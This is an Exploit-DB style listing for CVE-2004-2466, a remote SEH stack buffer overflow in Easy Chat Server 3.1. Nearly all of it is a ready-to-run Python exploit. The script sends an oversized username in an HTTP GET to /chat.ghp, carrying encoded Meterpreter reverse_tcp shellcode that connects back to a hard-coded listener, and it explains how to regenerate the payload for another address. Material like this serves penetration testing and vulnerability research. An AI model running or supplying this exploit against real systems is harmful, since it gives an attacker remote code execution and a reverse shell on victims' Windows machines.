Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)

EDB-ID:

50999


Author:

r00tpgp

Type:

remote


Platform:

Windows

Date:

2022-08-01


# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python3 easychat-exploit.py <victim-ip> <port>
# Spawns a reverse meterpreter to LHOST=192.168.0.162 LPORT=1990 -- start a matching
#   multi/handler on that address first. The listener address is baked into the encoded
#   shellcode, so regenerate it with the msfvenom command below to use another LHOST/LPORT.
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)

#!/usr/bin/python3
# NOTE: a shebang is only honoured when it is the very first line of the file; here it
# follows the header comment, so run the script explicitly with python3.

import sys
import socket
from struct import pack

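# --- Overflow layout ---------------------------------------------------------
# The username parameter of /chat.ghp is copied into a fixed stack buffer; after
# 217 bytes the SEH record is overwritten: [junk][nSEH][SEH][shellcode].
# The offset and the handler address were recovered by the original author
# against Easy Chat Server 3.1 and are build-specific: re-derive them (cyclic
# pattern, !mona findmsp / !mona seh) before using this against another build.
junk = b"A" * 217

# In memory: 90 90 EB 06 -> nop; nop; jmp short +6. Control reaches nSEH via the
# pop/pop/ret below; the jump skips the 4-byte handler pointer and lands 2 bytes
# into the NOP sled that precedes the shellcode.
nseh = pack("<L", 0x06eb9090)

# pop pop ret at 1001AE86 in SSLEAY32.DLL (address given by the original author).
# Presumably a non-SafeSEH, non-ASLR module at a fixed base -- verify with
# !mona seh for the exact DLL build on the target before relying on it.
seh = pack("<L", 0x1001ae86)

# Bytes excluded from the encoded shellcode (msfvenom -b below). Likely because
# NUL terminates the copied string and a space ends the URL -- unverified, but
# the payload must stay free of them either way; build_payload() enforces it.
BAD_CHARS = b"\x00\x20"

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" -v shellcode
# LHOST/LPORT live inside the encoded stub: re-run msfvenom to point the payload
# at a different listener and paste the new bytes over this block.
shellcode = b"\x90" * 16  # NOP sled; the nSEH jump lands inside it
shellcode += b"\xbb\xb4\xa4\x34\xc3\xdd\xc1\xd9\x74\x24\xf4\x5a\x33"
shellcode += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x5e\x58\xd6"
shellcode += b"\x36\x62\x49\x95\xb9\x9a\x8a\xfa\x30\x7f\xbb\x3a\x26"
shellcode += b"\xf4\xec\x8a\x2c\x58\x01\x60\x60\x48\x92\x04\xad\x7f"
shellcode += b"\x13\xa2\x8b\x4e\xa4\x9f\xe8\xd1\x26\xe2\x3c\x31\x16"
shellcode += b"\x2d\x31\x30\x5f\x50\xb8\x60\x08\x1e\x6f\x94\x3d\x6a"
shellcode += b"\xac\x1f\x0d\x7a\xb4\xfc\xc6\x7d\x95\x53\x5c\x24\x35"
shellcode += b"\x52\xb1\x5c\x7c\x4c\xd6\x59\x36\xe7\x2c\x15\xc9\x21"
shellcode += b"\x7d\xd6\x66\x0c\xb1\x25\x76\x49\x76\xd6\x0d\xa3\x84"
shellcode += b"\x6b\x16\x70\xf6\xb7\x93\x62\x50\x33\x03\x4e\x60\x90"
shellcode += b"\xd2\x05\x6e\x5d\x90\x41\x73\x60\x75\xfa\x8f\xe9\x78"
shellcode += b"\x2c\x06\xa9\x5e\xe8\x42\x69\xfe\xa9\x2e\xdc\xff\xa9"
shellcode += b"\x90\x81\xa5\xa2\x3d\xd5\xd7\xe9\x29\x1a\xda\x11\xaa"
shellcode += b"\x34\x6d\x62\x98\x9b\xc5\xec\x90\x54\xc0\xeb\xd7\x4e"
shellcode += b"\xb4\x63\x26\x71\xc5\xaa\xed\x25\x95\xc4\xc4\x45\x7e"
shellcode += b"\x14\xe8\x93\xd1\x44\x46\x4c\x92\x34\x26\x3c\x7a\x5e"
shellcode += b"\xa9\x63\x9a\x61\x63\x0c\x31\x98\xe4\xf3\x6e\xd4\xf0"
shellcode += b"\x9b\x6c\x18\xf8\xe6\xf8\xfe\x90\x08\xad\xa9\x0c\xb0"
shellcode += b"\xf4\x21\xac\x3d\x23\x4c\xee\xb6\xc0\xb1\xa1\x3e\xac"
shellcode += b"\xa1\x56\xcf\xfb\x9b\xf1\xd0\xd1\xb3\x9e\x43\xbe\x43"
shellcode += b"\xe8\x7f\x69\x14\xbd\x4e\x60\xf0\x53\xe8\xda\xe6\xa9"
shellcode += b"\x6c\x24\xa2\x75\x4d\xab\x2b\xfb\xe9\x8f\x3b\xc5\xf2"
shellcode += b"\x8b\x6f\x99\xa4\x45\xd9\x5f\x1f\x24\xb3\x09\xcc\xee"
shellcode += b"\x53\xcf\x3e\x31\x25\xd0\x6a\xc7\xc9\x61\xc3\x9e\xf6"
shellcode += b"\x4e\x83\x16\x8f\xb2\x33\xd8\x5a\x77\x43\x93\xc6\xde"
shellcode += b"\xcc\x7a\x93\x62\x91\x7c\x4e\xa0\xac\xfe\x7a\x59\x4b"
shellcode += b"\x1e\x0f\x5c\x17\x98\xfc\x2c\x08\x4d\x02\x82\x29\x44"


def build_payload() -> bytes:
    """Return junk | nSEH | SEH | shellcode for the ``username`` parameter.

    Raises:
        ValueError: if any byte from BAD_CHARS is present. A hand edit of the
            shellcode or of the SEH addresses would otherwise fail silently
            on the target.
    """
    payload = junk + nseh + seh + shellcode
    # Iterating a bytes object yields ints; ``int in bytes`` tests for that byte.
    found = [f"\\x{c:02x}" for c in BAD_CHARS if c in payload]
    if found:
        raise ValueError("payload contains bad characters: " + ", ".join(found))
    return payload


def build_request(host: str, port: int) -> bytes:
    """Return the raw HTTP/1.1 GET that carries the overflow to the server.

    Host and Referer are derived from the target instead of the unrelated fixed
    address the original exploit used; the server most likely ignores both, so
    this is for consistency only.
    """
    payload = build_payload()
    target = f"{host}:{port}".encode()
    origin = host.encode()
    lines = [
        b"GET /chat.ghp?username=" + payload + b"&password=&room=1&sex=1 HTTP/1.1",
        b"User-Agent: Mozilla/4.0",
        b"Host: " + target,
        b"Accept-Language: en-us",
        b"Accept-Encoding: gzip, deflate",
        b"Referer: http://" + origin,
        b"Connection: Keep-Alive",
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def main(argv) -> int:
    """Parse ``<victim-ip> <port>`` from argv, fire the request, return an exit code.

    Returns 2 on a usage error, 1 when the target cannot be reached, 0 after the
    buffer has been sent. Whether the session actually comes back depends on the
    listener, which this script does not check.
    """
    prog = argv[0] if argv else "easychat-exploit.py"
    if len(argv) != 3:
        print(f"Usage: {prog} <victim-ip> <port>", file=sys.stderr)
        return 2
    host = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        print(f"[-] Port must be an integer, got {argv[2]!r}", file=sys.stderr)
        return 2

    request = build_request(host, port)
    print("[*] Sending evil buffer...")
    try:
        # sendall() loops until every byte is written (send() may stop short);
        # the timeout keeps the script from hanging forever on a dead host.
        with socket.create_connection((host, port), timeout=10) as conn:
            conn.sendall(request)
    except OSError as exc:
        print(f"[-] Could not deliver buffer to {host}:{port}: {exc}", file=sys.stderr)
        return 1
    print("[+] Done!")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))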